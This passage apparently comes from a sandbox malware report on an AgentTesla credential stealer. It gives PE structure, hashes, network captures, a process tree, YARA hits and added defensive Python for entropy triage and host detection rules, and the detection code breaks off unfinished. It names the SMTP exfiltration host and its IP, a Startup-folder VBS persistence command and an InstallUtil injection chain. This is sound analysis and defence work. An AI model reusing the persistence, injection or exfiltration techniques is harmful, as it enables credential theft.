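            if name.lower().endswith((".vbs", ".vbe", ".js", ".wsf")):
                full = os.path.join(folder, name)
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    results.append({"file": full, **analyze_startup_script(fh.read())})
    return results


if __name__ == "__main__":
    print(analyze_startup_script(SAMPLE_STARTUP_VBS))
    for result in scan_startup_folders():
        print(result)
```

Run on the sample line the verdict is "suspicious" with `C:\Users\user\AppData\Roaming\AssemblyFullName.exe` as the flagged target; a script that only shows a message box yields "no-run-call". The same check is cheap to run from an EDR response script across a fleet, since Startup-folder scripts are rare on managed workstations.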
                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.990608378291438
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    File name:Wire Remittance Detail.exe
                                                                    File size:1'129'472 bytes
                                                                    MD5:834a1e4418d9543bcbb76aa9bd15fece
                                                                    SHA1:94d13721934655c477647509025346d1b7e93344
                                                                    SHA256:4587101c910c2af014b4f604c0ba76717c1c8b3f360ce0a191e81158b691f6cc
                                                                    SHA512:79b8c266ee83540ba82df58be2b00a5b3d1cce9e563aa842f9f22af3177a0e429b69188ee637367b0c941c858d47856cce51d4a8ed3738f0fa0c41524b1c3dca
                                                                    SSDEEP:24576:8E4cwG/FgJQfhA3D+Bwf6KLHPIlByEDT/MH1HoPw7rsecYjnTH:8EV5i2fy3Syvsk1+w7rsecYjT
                                                                    TLSH:F1353315A349A3DED2402F7739F722218384768EEE08DB972E9B839F1127B54C474A5F
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................2..........>Q... ...`....@.. ....................................`................................
                                                                    Icon Hash:90cececece8e8eb0
                                                                    Entrypoint:0x51513e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x67CFCDEB [Tue Mar 11 05:45:15 2025 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction (disassembly at the entry point 0x51513e)
jmp dword ptr [00402000h]
(The bytes following the jmp are zero padding, which the disassembler renders as a long run of `add byte ptr [eax], al`.)
0x402000 is imagebase 0x400000 plus the IAT RVA 0x2000, and the IAT holds the single import mscoree.dll!_CorExeMain. This is the standard native stub of a .NET executable: control goes straight to the CLR, and the real entry point is the managed Main in the metadata.
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1150f0         0x4b          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x116000         0x5b8         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x118000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x113144      0x113200  ce684c8f7d0c4e16beb511649623697c  False     0.9869510662766924  data       7.992784525923971    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x116000         0x5b8         0x600     97fbe641773f60299f445886ff826581  False     0.419921875         data       4.093206115147403    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x118000         0xc           0x200     28f06a8fd82127c8289a1dedfd17af79  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
The .text section accounts for 0x113200 = 1,126,912 of the file's 1,129,472 bytes (99.8%) at an entropy of 7.99 bits per byte, which is what a compressed or encrypted payload embedded in the assembly looks like; the remaining 0x600 bytes of resources and a 0x200-byte relocation stub are ordinary.
Name         RVA       Size   Type                                                                          Language  Country  ZLIB Complexity
RT_VERSION   0x1160a0  0x32c  data                                                                                              0.4224137931034483
RT_MANIFEST  0x1163cc  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                0.5489795918367347

DLL          Import
mscoree.dll  _CorExeMain

Description       Data
Translation       0x0000 0x04b0
Comments
CompanyName
FileDescription   Zedcnnrkti
FileVersion       1.0.0.0
InternalName      Zedcnnrkti.exe
LegalCopyright    Copyright 2012
LegalTrademarks
OriginalFilename  Zedcnnrkti.exe
ProductName       Zedcnnrkti
ProductVersion    1.0.0.0
Assembly Version  1.0.0.0
The version resource carries a generated-looking product name (Zedcnnrkti), empty company and comment fields, and a 2012 copyright on a binary whose PE timestamp is March 2025; the only import is the CLR entry stub, so the import hash says nothing about the payload's real capabilities.
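The static tables above are enough to triage this file without running it: the COM descriptor directory at RVA 0x2008 marks it as managed, the PE timestamp 0x67CFCDEB decodes to 2025-03-11 05:45:15 UTC (under three hours before the sandbox run), and a single executable section holding 99.8% of the file at entropy 7.99 is the signature of a packed .NET loader. The following Python is an added example, not Joe Sandbox code or the sample's own: it walks the PE headers with `struct`, computes per-section Shannon entropy, and applies a packing heuristic. The thresholds (entropy 7.5, section share 0.9) are assumptions; `build_synthetic_pe` constructs a minimal test image so the block runs offline without the malware.

```python
import math
import random
import struct
from collections import Counter
from datetime import datetime, timezone

IMAGE_SCN_MEM_EXECUTE = 0x20000000
COM_DESCRIPTOR_INDEX = 14          # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte, 0.0 for empty input up to 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(pe: bytes) -> dict:
    """Minimal PE32/PE32+ walk: compile timestamp, CLR presence, per-section entropy."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    num_sections, timestamp = struct.unpack_from("<HI", pe, coff + 2)   # NumberOfSections, TimeDateStamp
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)               # SizeOfOptionalHeader
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", pe, opt)
    dir_base = opt + (96 if magic == 0x10B else 112)                    # data directories: PE32 vs PE32+
    com_rva, com_size = struct.unpack_from("<II", pe, dir_base + COM_DESCRIPTOR_INDEX * 8)
    sections = []
    for i in range(num_sections):
        off = opt + opt_size + 40 * i
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        (chars,) = struct.unpack_from("<I", pe, off + 36)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize, "raw_size": raw_size,
            "entropy": shannon_entropy(raw),
            "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE),
        })
    return {
        "timestamp": datetime.fromtimestamp(timestamp, timezone.utc),
        "is_dotnet": com_rva != 0 and com_size != 0,
        "sections": sections,
        "file_size": len(pe),
    }


def packer_verdict(info: dict, entropy_threshold: float = 7.5, share_threshold: float = 0.9) -> dict:
    """Flag an executable section that holds nearly the whole file at near-maximal entropy (assumed thresholds)."""
    hits = []
    for s in info["sections"]:
        share = s["raw_size"] / info["file_size"] if info["file_size"] else 0.0
        if s["executable"] and s["entropy"] >= entropy_threshold and share >= share_threshold:
            hits.append({"section": s["name"], "entropy": round(s["entropy"], 3), "share": round(share, 3)})
    return {"packed": bool(hits), "hits": hits, "is_dotnet": info["is_dotnet"]}


def random_bytes(n: int, seed: int = 0) -> bytes:
    """Deterministic high-entropy filler standing in for an encrypted payload (constructed data)."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


def build_synthetic_pe(text_payload: bytes, timestamp: int, managed: bool = True) -> bytes:
    """Assemble a minimal PE32 image with one .text section; test input only, not a loadable binary."""
    e_lfanew = 0x80
    opt_size = 224                                                   # PE32 optional header incl. 16 directories
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    if managed:
        struct.pack_into("<II", opt, 96 + COM_DESCRIPTOR_INDEX * 8, 0x2008, 0x48)
    raw_ptr = (e_lfanew + 4 + 20 + opt_size + 40 + 0x1FF) & ~0x1FF   # first 512-byte file alignment boundary
    section = struct.pack("<8sIIIIIIHHI", b".text", len(text_payload), 0x2000, len(text_payload),
                          raw_ptr, 0, 0, 0, 0, 0x60000020)          # CODE | EXECUTE | READ
    return (dos + b"PE\0\0" + coff + bytes(opt) + section).ljust(raw_ptr, b"\0") + text_payload


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:
        info = parse_pe(fh.read())
    print("compiled:", info["timestamp"].isoformat(), "managed:", info["is_dotnet"])
    for s in info["sections"]:
        print(f'{s["name"]:8} raw=0x{s["raw_size"]:x} entropy={s["entropy"]:.3f} exec={s["executable"]}')
    print(packer_verdict(info))
```

Against the real sample the section loop would reproduce the table above (.text at 7.99, .rsrc at 4.09, .reloc at 0.10) and the verdict would flag .text with share 0.998. The entropy threshold deliberately sits well above what ordinary compiled .NET IL reaches, so false positives come mainly from legitimately obfuscated commercial software, which is worth a look anyway.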
TCP packets:
Timestamp                            Src Port  Dst Port  Source IP      Dest IP
Mar 11, 2025 09:22:55.202249050 CET  49681     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:22:55.202290058 CET  443       49681     104.26.13.205  192.168.2.10
Mar 11, 2025 09:22:55.202451944 CET  49681     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:22:55.213167906 CET  49681     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:22:55.213190079 CET  443       49681     104.26.13.205  192.168.2.10
Mar 11, 2025 09:22:57.384313107 CET  443       49681     104.26.13.205  192.168.2.10
Mar 11, 2025 09:22:57.384516954 CET  49681     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:22:57.390485048 CET  49681     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:22:57.390507936 CET  443       49681     104.26.13.205  192.168.2.10
Mar 11, 2025 09:22:57.390835047 CET  443       49681     104.26.13.205  192.168.2.10
Mar 11, 2025 09:22:57.441710949 CET  49681     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:22:57.455668926 CET  49681     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:22:57.496324062 CET  443       49681     104.26.13.205  192.168.2.10
Mar 11, 2025 09:22:58.842782974 CET  443       49681     104.26.13.205  192.168.2.10
Mar 11, 2025 09:22:58.842945099 CET  443       49681     104.26.13.205  192.168.2.10
Mar 11, 2025 09:22:58.843110085 CET  49681     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:22:58.933212996 CET  49681     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:23:00.215179920 CET  49682     25        192.168.2.10   46.175.148.58
Mar 11, 2025 09:23:01.222866058 CET  49682     25        192.168.2.10   46.175.148.58
Mar 11, 2025 09:23:03.222879887 CET  49682     25        192.168.2.10   46.175.148.58
Mar 11, 2025 09:23:07.238487959 CET  49682     25        192.168.2.10   46.175.148.58
Mar 11, 2025 09:23:09.356456041 CET  49685     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:23:09.356519938 CET  443       49685     104.26.13.205  192.168.2.10
Mar 11, 2025 09:23:09.356914997 CET  49685     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:23:09.360615015 CET  49685     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:23:09.360637903 CET  443       49685     104.26.13.205  192.168.2.10
Mar 11, 2025 09:23:11.291117907 CET  443       49685     104.26.13.205  192.168.2.10
Mar 11, 2025 09:23:11.291208982 CET  49685     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:23:11.293260098 CET  49685     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:23:11.293275118 CET  443       49685     104.26.13.205  192.168.2.10
Mar 11, 2025 09:23:11.293544054 CET  443       49685     104.26.13.205  192.168.2.10
Mar 11, 2025 09:23:11.347883940 CET  49685     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:23:11.348670959 CET  49685     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:23:11.396325111 CET  443       49685     104.26.13.205  192.168.2.10
Mar 11, 2025 09:23:11.933619022 CET  443       49685     104.26.13.205  192.168.2.10
Mar 11, 2025 09:23:11.933695078 CET  443       49685     104.26.13.205  192.168.2.10
Mar 11, 2025 09:23:11.933743954 CET  49685     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:23:11.937016964 CET  49685     443       192.168.2.10   104.26.13.205
Mar 11, 2025 09:23:12.577893019 CET  49688     25        192.168.2.10   46.175.148.58
Mar 11, 2025 09:23:13.566638947 CET  49688     25        192.168.2.10   46.175.148.58
Mar 11, 2025 09:23:15.566663027 CET  49688     25        192.168.2.10   46.175.148.58
Mar 11, 2025 09:23:19.566626072 CET  49688     25        192.168.2.10   46.175.148.58
Mar 11, 2025 09:23:27.566648960 CET  49688     25        192.168.2.10   46.175.148.58
Two complete TLS sessions to 104.26.13.205:443 (api.ipify.org) bracket two bursts of packets to 46.175.148.58:25. Only client-to-server packets appear for port 25, from source ports 49682 and 49688 at doubling intervals (1, 2, 4 and then 8 seconds), which is what TCP SYN retransmission looks like; no packet from the mail server was captured, so the SMTP exfiltration channel never came up during this run.
UDP packets:
Timestamp                            Src Port  Dst Port  Source IP     Dest IP
Mar 11, 2025 09:22:55.188963890 CET  55111     53        192.168.2.10  1.1.1.1
Mar 11, 2025 09:22:55.196198940 CET  53        55111     1.1.1.1       192.168.2.10
Mar 11, 2025 09:23:00.194535971 CET  63352     53        192.168.2.10  1.1.1.1
Mar 11, 2025 09:23:00.214318991 CET  53        63352     1.1.1.1       192.168.2.10
DNS queries:
Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                     Type            Class        DNS over HTTPS
Mar 11, 2025 09:22:55.188963890 CET  192.168.2.10  1.1.1.1  0x21ee    Standard query (0)  api.ipify.org            A (IP address)  IN (0x0001)  false
Mar 11, 2025 09:23:00.194535971 CET  192.168.2.10  1.1.1.1  0x8e3b    Standard query (0)  mail.iaa-airferight.com  A (IP address)  IN (0x0001)  false

DNS answers:
Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name                     CName  Address        Type            Class        DNS over HTTPS
Mar 11, 2025 09:22:55.196198940 CET  1.1.1.1    192.168.2.10  0x21ee    No error (0)  api.ipify.org            -      104.26.13.205  A (IP address)  IN (0x0001)  false
Mar 11, 2025 09:22:55.196198940 CET  1.1.1.1    192.168.2.10  0x21ee    No error (0)  api.ipify.org            -      104.26.12.205  A (IP address)  IN (0x0001)  false
Mar 11, 2025 09:22:55.196198940 CET  1.1.1.1    192.168.2.10  0x21ee    No error (0)  api.ipify.org            -      172.67.74.152  A (IP address)  IN (0x0001)  false
Mar 11, 2025 09:23:00.214318991 CET  1.1.1.1    192.168.2.10  0x8e3b    No error (0)  mail.iaa-airferight.com  -      46.175.148.58  A (IP address)  IN (0x0001)  false
                                                                    • api.ipify.org
Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.10  49681        104.26.13.205   443               6236  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp                Bytes  Direction  Data
2025-03-11 08:22:57 UTC  155    OUT        GET / HTTP/1.1
                                           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                           Host: api.ipify.org
                                           Connection: Keep-Alive
2025-03-11 08:22:58 UTC  426    IN         HTTP/1.1 200 OK
                                           Date: Tue, 11 Mar 2025 08:22:58 GMT
                                           Content-Type: text/plain
                                           Content-Length: 13
                                           Connection: close
                                           Vary: Origin
                                           cf-cache-status: DYNAMIC
                                           Server: cloudflare
                                           CF-RAY: 91e9a5a41f8c0add-LAS
                                           server-timing: cfL4;desc="?proto=TCP&rtt=13470&min_rtt=9681&rtt_var=11210&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4190&recv_bytes=769&delivery_rate=71969&cwnd=232&unsent_bytes=0&cid=f5ccd57915c39c8d&ts=1024&x=0"
2025-03-11 08:22:58 UTC  13     IN         Data Raw: 35 30 2e 31 35 39 2e 33 32 2e 32 35 32
                                           Data Ascii: 50.159.32.252


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.10  49685        104.26.13.205   443               7136  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp                Bytes  Direction  Data
2025-03-11 08:23:11 UTC  155    OUT        GET / HTTP/1.1
                                           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                           Host: api.ipify.org
                                           Connection: Keep-Alive
2025-03-11 08:23:11 UTC  425    IN         HTTP/1.1 200 OK
                                           Date: Tue, 11 Mar 2025 08:23:11 GMT
                                           Content-Type: text/plain
                                           Content-Length: 13
                                           Connection: close
                                           Vary: Origin
                                           cf-cache-status: DYNAMIC
                                           Server: cloudflare
                                           CF-RAY: 91e9a5f9c9770ad5-LAS
                                           server-timing: cfL4;desc="?proto=TCP&rtt=13896&min_rtt=8816&rtt_var=7037&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=328121&cwnd=251&unsent_bytes=0&cid=9138f526b0606026&ts=773&x=0"
2025-03-11 08:23:11 UTC  13     IN         Data Raw: 35 30 2e 31 35 39 2e 33 32 2e 32 35 32
                                           Data Ascii: 50.159.32.252
Both requests come from InstallUtil.exe (two separate PIDs, 6236 and 7136), the signed .NET framework utility the sample injects its payload into, yet each carries a hard-coded Firefox 99 User-Agent. The 13-byte body is the analysis machine's public address, 50.159.32.252; fetching it is the first thing the injected code does, and the SMTP attempts to mail.iaa-airferight.com follow a few seconds after each lookup.
                                                                    Target ID:0
                                                                    Start time:04:22:53
                                                                    Start date:11/03/2025
                                                                    Path:C:\Users\user\Desktop\Wire Remittance Detail.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Wire Remittance Detail.exe"
                                                                    Imagebase:0xcd0000
                                                                    File size:1'129'472 bytes
                                                                    MD5 hash:834A1E4418D9543BCBB76AA9BD15FECE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1105377682.0000000005B50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1083367719.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1101766073.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:04:22:53
                                                                    Start date:11/03/2025
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                    Imagebase:0xc70000
                                                                    File size:42'064 bytes
                                                                    MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1228824034.000000000312C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1228824034.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1228824034.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:04:23:06
                                                                    Start date:11/03/2025
                                                                    Path:C:\Windows\System32\wscript.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs"
                                                                    Imagebase:0x7ff62fe70000
                                                                    File size:170'496 bytes
                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:04:23:07
                                                                    Start date:11/03/2025
                                                                    Path:C:\Users\user\AppData\Roaming\AssemblyFullName.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\AssemblyFullName.exe"
                                                                    Imagebase:0xc20000
                                                                    File size:1'129'472 bytes
                                                                    MD5 hash:834A1E4418D9543BCBB76AA9BD15FECE
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 54%, Virustotal, Browse
                                                                    • Detection: 55%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:04:23:08
                                                                    Start date:11/03/2025
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                    Imagebase:0x590000
                                                                    File size:42'064 bytes
                                                                    MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2318499009.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2318499009.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2318499009.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false
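The process list and the api.ipify.org session above contain four behaviours that a detection engineer can turn into host rules: the sample starting InstallUtil.exe with no arguments (an injection target, since InstallUtil normally requires an assembly path), wscript.exe running a .vbs that sits in the per-user Startup folder, a copy of the sample (same MD5 as the original) executing directly under AppData\Roaming, and an external-IP lookup to api.ipify.org made from InstallUtil.exe rather than a browser. The following is an added example, written for this page rather than taken from the Joe Sandbox report or from AgentTesla itself, that encodes those rules and runs them over constructed Sysmon-style events mirroring the report. It generalises slightly beyond the report: cscript.exe is treated like wscript.exe, and a few other public IP-echo hosts are included. The event field names, the parent/child links, every PID other than 7136, the extra IP-echo hosts and the browser exclusion list are all assumptions.

```python
"""Rules for the AgentTesla behaviour chain: InstallUtil.exe as an argument-less
injection target, a .vbs dropped into the Startup folder, a copy of the sample
under AppData\\Roaming, and an external-IP lookup from a non-browser process."""
import re
from typing import Callable, Dict, List, Tuple

INSTALLUTIL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
STARTUP_VBS = (r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu"
               r"\Programs\Startup\AssemblyFullName.vbs")

# Constructed Sysmon-style events mirroring the report (not real telemetry).
# Field names, parent/child links and every PID except 7136 are assumptions.
SAMPLE_EVENTS: List[Dict] = [
    {"type": "process", "pid": 7100, "ppid": 4100,
     "image": r"C:\Users\user\Desktop\Wire Remittance Detail.exe",
     "cmdline": r'"C:\Users\user\Desktop\Wire Remittance Detail.exe"'},
    {"type": "process", "pid": 7136, "ppid": 7100,
     "image": INSTALLUTIL, "cmdline": f'"{INSTALLUTIL}"'},
    {"type": "process", "pid": 7300, "ppid": 7100,
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": f'"C:\\Windows\\System32\\WScript.exe" "{STARTUP_VBS}"'},
    {"type": "process", "pid": 7320, "ppid": 7300,
     "image": r"C:\Users\user\AppData\Roaming\AssemblyFullName.exe",
     "cmdline": r'"C:\Users\user\AppData\Roaming\AssemblyFullName.exe"'},
    {"type": "network", "pid": 7136, "image": INSTALLUTIL,
     "dst_host": "api.ipify.org", "dst_port": 443,
     "body_hex": "35 30 2e 31 35 39 2e 33 32 2e 32 35 32"},
]

# Assumed lists: public IP-echo services beyond the one in the report, and
# browsers that may legitimately query them.
IP_ECHO_HOSTS = {"api.ipify.org", "api64.ipify.org", "icanhazip.com", "checkip.amazonaws.com"}
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)
APPDATA_ROOT_EXE = re.compile(r"\\appdata\\roaming\\[^\\]+\.exe$", re.I)
IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def split_cmdline(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace outside double quotes, dropping the quotes."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


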